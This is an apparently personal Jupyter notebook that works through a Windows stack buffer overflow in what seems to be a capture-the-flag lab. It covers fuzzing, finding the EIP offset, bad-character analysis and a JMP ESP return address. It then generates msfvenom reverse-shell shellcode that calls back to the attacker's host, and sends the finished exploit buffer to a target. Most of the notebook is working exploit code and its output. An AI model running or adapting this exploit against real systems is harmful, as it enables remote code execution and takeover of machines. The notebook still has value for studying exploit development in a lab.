# Buffer Overflow Basics:

Crash The Application

Find EIP

Control ESP

Identify Bad Characters

Find JMP ESP

Generate Shell Code

Exploit

https://github.com/gh0x0st/Buffer_Overflow

# Fuzzing: (Crash App)

ip = "10.10.8.230"

port = 1337
timeout = 5
prefix = "OVERFLOW2 "Run app in Immunity...

In [1]:
ip = "10.10.39.252"

port = 31337
timeout = 5
prefix = ""

In [41]:
#!/usr/bin/env python3

import socket, time, sys

string =  "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes("WINDOWS", "latin-1"))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)
    except:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)

Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing with 800 bytes
Fuzzing with 900 bytes
Fuzzing with 1000 bytes
Fuzzing with 1100 bytes
Fuzzing with 1200 bytes
Fuzzing with 1300 bytes
Fuzzing with 1400 bytes
Fuzzing with 1500 bytes
Fuzzing with 1600 bytes
Fuzzing with 1700 bytes
Fuzzing with 1800 bytes
Fuzzing with 1900 bytes
Fuzzing with 2000 bytes
Fuzzing with 2100 bytes


ERROR:root:Internal Python error in the inspect module.
Below is the traceback from this internal error.



Fuzzing crashed at 2200 bytes
Traceback (most recent call last):
  File "/tmp/ipykernel_2302/1253587491.py", line 12, in <module>
    s.recv(1024)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/miniconda/lib/python3.9/site-packages/IPython/core/interactiveshell.py", line 3441, in run_code
    exec(code_obj, self.user_global_ns, self.user_ns)
  File "/tmp/ipykernel_2302/1253587491.py", line 19, in <module>
    sys.exit(0)
SystemExit: 0

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/miniconda/lib/python3.9/site-packages/IPython/core/ultratb.py", line 1101, in get_records
    return _fixed_getinnerframes(etb, number_of_lines_of_context, tb_offset)
  File "/root/miniconda/lib/python3.9/site-packages/IPython/core/ultratb.py", line 248, in wrapped
    return f(*args, **kwargs)
  File "/root/miniconda/lib/python3.9/site-packa

TypeError: object of type 'NoneType' has no len()

In [39]:
# crash_size = len(string) - len(prefix)

crash_size = 300

Ensure EIP is overwritten with AAAAAAAAA!

Mona is Windows specific plugin for Immunity Debugger:

In [40]:
!mona config -set workingfolder c:\mona\%p

/bin/bash: mona: command not found


# Crash Replication, Locating EIP:

#### Payload: Should *sometimes* be 400 bytes longer than pattern that crashed server

(Make sure to insert below)

In [41]:
!locate pattern_create.rb

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb


In [42]:
crash_padding = 400
crash_size_padded = crash_size + crash_padding
# payload_sl = !/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l {crash_size_padded}
# payload_sl = !/opt/metasploit-framework-5101/tools/exploit/pattern_create.rb -l {crash_size_padded}

payload_sl = !/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l {crash_size}

In [43]:
payload = payload_sl.s

payload

'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9'

In [32]:
import socket
import time
def run_overflow(payload, prefix="", offset=0, retn="", padding="", target=None):
    overflow = "A" * offset
    postfix = ""
    
    if target is None:
        target=ip
        
    buffer = prefix + overflow + retn + padding + payload + postfix

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        s.connect((target, port))
#         s.recv(1024)
        print("Sending evil buffer...")
#         s.send(bytes("WINDOWS" +"\r\n", "latin-1"))
        
        s.send(bytes(buffer, "latin-1"))
        s.send(bytes("\n\r", "latin-1"))
        time.sleep(1)
        print(s.recv(1024))
        print("Done!")
    except:
        print("Could not connect.")

In [44]:
run_overflow(payload)

# run_overflow("A"*100)

Sending evil buffer...
Could not connect.


In [45]:
!echo !mona findmsp -distance {crash_size_padded}

!mona findmsp -distance 700


Alternatively:

In [62]:
# !msf-pattern_offset -l {crash_size} -q <CRASHED EIP>
!msf-pattern_offset -l {crash_size} -q 31704330

[*] Exact match at offset 2012


### Look for "EIP Contains Normal Pattern:" and get offset:

In [46]:
offset = 146

# Controlling EIP (next instruction pointer):

In [47]:
run_overflow("", offset=offset, retn="BBBB", prefix="") # BBBB is 42424242

Sending evil buffer...
b''
Done!


Re run in Immunity, verify we can overwrite EIP!

EIP should be 42424242

Note: ESP is pointer to current stack location, allows us to add data to stack.

# Finding Bad Chars:

In [221]:
!mona bytearray -b "\x00"

zsh:1: command not found: mona


### Generate all possible chars:

In [48]:
def get_goodchars(badchars=""):
    bytearray_value = ""
    
    human_readable = bytes(badchars, encoding="unicode-escape").decode("ascii")
    badints = [int(x, 16) for x in human_readable.split("\\\\x")[1:]]
    print(human_readable, badints)
    
    for x in range(1, 256):
        if x in badints:
            continue
        else:
            bytearray_value += "\\x" + "{:02x}".format(x)
    bytearray_bytes =bytes(bytearray_value, encoding='ascii').decode('unicode_escape')
    return bytearray_bytes

In [49]:
bytearray_value = get_goodchars()
print(bytearray_value)

 []
	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ


## Repeat from here!
### Run and note ESP location:

In [72]:
run_overflow(bytearray_value, offset=offset, retn="BBBB", prefix=prefix)

Sending evil buffer...
Could not connect.


Get ESP Address

In [124]:
!mona compare -f bytearray.bin -a 015D19F8

zsh:1: command not found: mona


^ Crashing immunity appears to be a successful result...

Find characters that are not equal:

In [52]:
raw_string = "00 0a"

split_string = raw_string.split(" ")
final_string = []
for i in range(1, len(split_string)):
    if not int(split_string[i], 16) == int(split_string[i-1], 16) + 1:
        final_string.append(split_string[i])
badchars_full = "\\x"+"\\x".join(split_string)
badchars_auto = "\\x00\\x"+"\\x".join(final_string)
badchars_auto, badchars_full

('\\x00\\x0a', '\\x00\\x0a')

NOTE: If you remove one and it comes back, keep it!

In [53]:
# print(badchars_full)
# keepme=""
# badchars=badchars+keepme

\x00\x0a


NameError: name 'badchars' is not defined

In [54]:
# "\x00<OTHER BAD_CHARS>"
# Remmeber back to back badchars might not be bad chars! Don't remove secon ones in sequence
# 00 11 12 40 41 5f 60 b8 b9 ee ef
badchars = badchars_auto
# badchars = "\\x00"
print("Run this:")
print("!mona bytearray -b", '"%s"' % badchars)

!mona bytearray -b "\x00\x0a"


In [55]:
bytearray_value = get_goodchars(badchars)
print(bytearray_value)

\\x00\\x0a [0, 10]
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ


### Repeat!

# Find Jump Point:

### Make sure to run while program is running or crashed:

In [57]:
print("!mona jmp -r esp -cpb", '"%s"' % badchars)

!mona jmp -r esp -cpb "\x00\x0a"


### Pick a jump point and record it:

In [74]:
jump_forwards = "\x08\x04\x16\xbf"
jump_backwards = "".join(list(reversed(jump_forwards))) # Little endian

print(jump_forwards,",",jump_backwards)

¿ , ¿


In [75]:
final_retn = jump_backwards

# Generate Payload:

In [76]:
!ip a | grep 10.

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    inet 10.10.252.114/16 brd 10.10.255.255 scope global dynamic eth0


In [77]:
%env LHOST=10.10.252.114

env: LHOST=10.10.252.114


In [78]:
print("add to -b below")
print(badchars)

add to -b below
\x00\x0a


In [79]:
import os
!msfvenom -p windows/shell_reverse_tcp LHOST={os.environ["LHOST"]} LPORT=7777 EXITFUNC=thread -b "\x00\x0a" -f c


[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xd9\xe8\xbd\x0e\xba\x27\xb4\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x52\x31\x68\x17\x03\x68\x17\x83\xce\xbe\xc5\x41\x32\x56\x8b"
"\xaa\xca\xa7\xec\x23\x2f\x96\x2c\x57\x24\x89\x9c\x13\x68\x26"
"\x56\x71\x98\xbd\x1a\x5e\xaf\x76\x90\xb8\x9e\x87\x89\xf9\x81"
"\x0b\xd0\x2d\x61\x35\x1b\x20\x60\x72\x46\xc9\x30\x2b\x0c\x7c"
"\xa4\x58\x58\xbd\x4f\x12\x4c\xc5\xac\xe3\x6f\xe4\x63\x7f\x36"
"\x26\x82\xac\x42\x6f\x9c\xb1\x6f\x39\x17\x01\x1b\xb8\xf1\x5b"
"\xe4\x17\x3c\x54\x17\x69\x79\x53\xc8\x1c\x73\xa7\x75\x27\x40"
"\xd5\xa1\xa2\x52\x7d\x21\x14\xbe\x7f\xe6\xc3\x35\x73\x43\x87"
"\x11\

In [80]:
final_payload = ("\xd9\xe8\xbd\x0e\xba\x27\xb4\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x52\x31\x68\x17\x03\x68\x17\x83\xce\xbe\xc5\x41\x32\x56\x8b"
"\xaa\xca\xa7\xec\x23\x2f\x96\x2c\x57\x24\x89\x9c\x13\x68\x26"
"\x56\x71\x98\xbd\x1a\x5e\xaf\x76\x90\xb8\x9e\x87\x89\xf9\x81"
"\x0b\xd0\x2d\x61\x35\x1b\x20\x60\x72\x46\xc9\x30\x2b\x0c\x7c"
"\xa4\x58\x58\xbd\x4f\x12\x4c\xc5\xac\xe3\x6f\xe4\x63\x7f\x36"
"\x26\x82\xac\x42\x6f\x9c\xb1\x6f\x39\x17\x01\x1b\xb8\xf1\x5b"
"\xe4\x17\x3c\x54\x17\x69\x79\x53\xc8\x1c\x73\xa7\x75\x27\x40"
"\xd5\xa1\xa2\x52\x7d\x21\x14\xbe\x7f\xe6\xc3\x35\x73\x43\x87"
"\x11\x90\x52\x44\x2a\xac\xdf\x6b\xfc\x24\x9b\x4f\xd8\x6d\x7f"
"\xf1\x79\xc8\x2e\x0e\x99\xb3\x8f\xaa\xd2\x5e\xdb\xc6\xb9\x36"
"\x28\xeb\x41\xc7\x26\x7c\x32\xf5\xe9\xd6\xdc\xb5\x62\xf1\x1b"
"\xb9\x58\x45\xb3\x44\x63\xb6\x9a\x82\x37\xe6\xb4\x23\x38\x6d"
"\x44\xcb\xed\x22\x14\x63\x5e\x83\xc4\xc3\x0e\x6b\x0e\xcc\x71"
"\x8b\x31\x06\x1a\x26\xc8\xc1\x2f\xbd\x2e\x63\x58\xc3\xce\x9a"
"\xf9\x4a\x28\xc8\xe9\x1a\xe3\x65\x93\x06\x7f\x17\x5c\x9d\xfa"
"\x17\xd6\x12\xfb\xd6\x1f\x5e\xef\x8f\xef\x15\x4d\x19\xef\x83"
"\xf9\xc5\x62\x48\xf9\x80\x9e\xc7\xae\xc5\x51\x1e\x3a\xf8\xc8"
"\x88\x58\x01\x8c\xf3\xd8\xde\x6d\xfd\xe1\x93\xca\xd9\xf1\x6d"
"\xd2\x65\xa5\x21\x85\x33\x13\x84\x7f\xf2\xcd\x5e\xd3\x5c\x99"
"\x27\x1f\x5f\xdf\x27\x4a\x29\x3f\x99\x23\x6c\x40\x16\xa4\x78"
"\x39\x4a\x54\x86\x90\xce\x74\x65\x30\x3b\x1d\x30\xd1\x86\x40"
"\xc3\x0c\xc4\x7c\x40\xa4\xb5\x7a\x58\xcd\xb0\xc7\xde\x3e\xc9"
"\x58\x8b\x40\x7e\x58\x9e")

print(final_payload)

Ùè½º'´Ùt$ôX1É±R1hhÎ¾ÅA2VªÊ§ì#/,W$h&Vq½^¯v¸ùÐ-a5 `rFÉ0+|¤XX½OLÅ¬ãoäc6&¬Bo±o9¸ñ[ä<TiySÈs§u'@Õ¡¢R}!¾æÃ5sCRD*¬ßkü$OØmñyÈ.³ªÒ^ÛÆ¹6(ëAÇ&|2õéÖÜµbñ¹XE³Dc¶7æ´#8mDËí"c^ÄÃkÌq1&ÈÁ/½.cXÃÎùJ(Èéãe\úÖûÖ^ïïMïùÅbHùÇ®ÅQ:øÈXóØÞmýáÊÙñmÒe¥!3òÍ^Ó\'_ß'J)?#l@¤x9JTÎte0;0Ñ@ÃÄ|@¤µzXÍ°ÇÞ>ÉX@~X


# Add Padding:

This gives the exploit room to unpack itself

In [81]:
padding = "\x90" * 16

# Run Exploit:

Run Netcat:

In [ ]:
run_overflow(final_payload, offset=offset, retn=final_retn, padding=padding, prefix=prefix)

Sending evil buffer...


In [90]:
target = "10.10.92.230"
run_overflow(final_payload, offset=offset, retn=final_retn, padding=padding, prefix=prefix, target=target)

Sending evil buffer...
Done!
